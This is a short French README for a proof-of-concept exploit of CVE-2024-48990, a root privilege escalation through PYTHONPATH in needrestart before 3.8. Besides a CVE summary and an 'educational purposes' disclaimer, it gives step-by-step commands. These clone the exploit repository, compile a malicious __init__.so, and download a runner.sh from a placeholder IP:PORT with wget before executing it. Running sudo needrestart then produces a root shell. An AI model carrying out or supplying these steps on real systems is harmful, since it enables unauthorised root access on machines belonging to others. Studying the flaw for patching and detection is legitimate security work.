
PoC sur CVE-2024-48990. Qualys a découvert que needrestart, avant la version 3.8, permet aux attaquants locaux d'exécuter du code arbitraire en tant que root en trompant needrestart pour qu'il exécute l'interpréteur Python avec une variable d'environnement PYTHONPATH contrôlée par l'attaquant. (NIST)
[!WARNING] Ces fichiers et informations sont destinés uniquement à des fins éducatives. L'auteur n'est pas responsable de tout comportement malveillant. Toutes les informations fournies n'ont pas pour but d'inciter à un type de crime ou d'abus.
Qualys a découvert que needrestart, avant la version 3.8, permet à des attaquants locaux d'exécuter du code arbitraire en tant que root en trompant needrestart pour qu'il exécute l'interpréteur Python avec une variable d'environnement PYTHONPATH contrôlée par l'attaquant. Consultez NIST pour les détails officiels.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
Quand vous lisez [*] CVE module created, appuyez sur CTRL+C pour arrêter le processus et obtenir votre shell !